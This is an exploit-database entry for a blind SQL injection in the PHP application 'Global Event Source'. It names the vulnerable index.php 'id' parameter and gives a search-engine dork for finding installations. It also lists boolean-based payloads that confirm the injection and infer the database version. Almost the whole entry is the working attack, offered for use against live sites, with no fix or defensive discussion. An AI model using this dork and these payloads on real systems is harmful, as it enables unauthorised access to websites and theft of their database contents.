Global Event Source (index.php) Blind Sql Injection Vulnerability

2010-09-03T00:00:00
ID 1337DAY-ID-13963
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2010-09-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================
Global Event Source (index.php) Blind Sql Injection Vulnerability
=================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : Global Event Source
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by: Global Event Source"

####################################################################

===[ Exploit ]===

www.site.com/index.php?p=Event&id=184[Blind Injection]


www.site.com/index.php?p=Event&id=184+and+1=1 >>> True
www.site.com/index.php?p=Event&id=184+and+1=2 >>> False

www.site.com/index.php?p=Event&id=184+and+substring(@@version,1,1)=5 >>> True
www.site.com/index.php?p=Event&id=184+and+substring(@@version,1,1)=4 >>> False

####################################################################



#  0day.today [2018-01-04]  #